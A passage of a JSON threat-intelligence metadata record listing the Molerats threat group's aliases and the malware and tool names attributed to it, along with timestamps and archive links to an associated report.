			"main_name": "Molerats",
			"aliases": [
				"ATK 89",
				"Aluminum Saratoga",
				"Extreme Jackal",
				"G0021",
				"Gaza Cybergang",
				"Gaza Hackers Team",
				"Molerats",
				"Operation DustySky",
				"Operation DustySky Part 2",
				"Operation Molerats",
				"Operation Moonlight",
				"Operation SneakyPastes",
				"Operation TopHat",
				"TA402",
				"TAG-CT5"
			],
			"source_name": "ETDA:Molerats",
			"tools": [
				"BadPatch",
				"Bladabindi",
				"BrittleBush",
				"Chymine",
				"CinaRAT",
				"Darkmoon",
				"Downeks",
				"DropBook",
				"DustySky",
				"ExtRat",
				"Gen:Trojan.Heur.PT",
				"H-Worm",
				"H-Worm RAT",
				"Houdini",
				"Houdini RAT",
				"Hworm",
				"Iniduoh",
				"IronWind",
				"Jenxcus",
				"JhoneRAT",
				"Jorik",
				"KasperAgent",
				"Kognito",
				"LastConn",
				"Micropsia",
				"MoleNet",
				"Molerat Loader",
				"NeD Worm",
				"NimbleMamba",
				"Njw0rm",
				"Pierogi",
				"Poison Ivy",
				"Quasar RAT",
				"QuasarRAT",
				"SPIVY",
				"Scote",
				"SharpSploit",
				"SharpStage",
				"WSHRAT",
				"WelcomeChat",
				"Xtreme RAT",
				"XtremeRAT",
				"Yggdrasil",
				"dinihou",
				"dunihi",
				"njRAT",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434347,
	"ts_updated_at": 1775826741,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d2ca9f65335364294199311f865dacef8fe13520.pdf",
		"text": "https://archive.orkl.eu/d2ca9f65335364294199311f865dacef8fe13520.txt",
		"img": "https://archive.orkl.eu/d2ca9f65335364294199311f865dacef8fe13520.jpg"
	}
}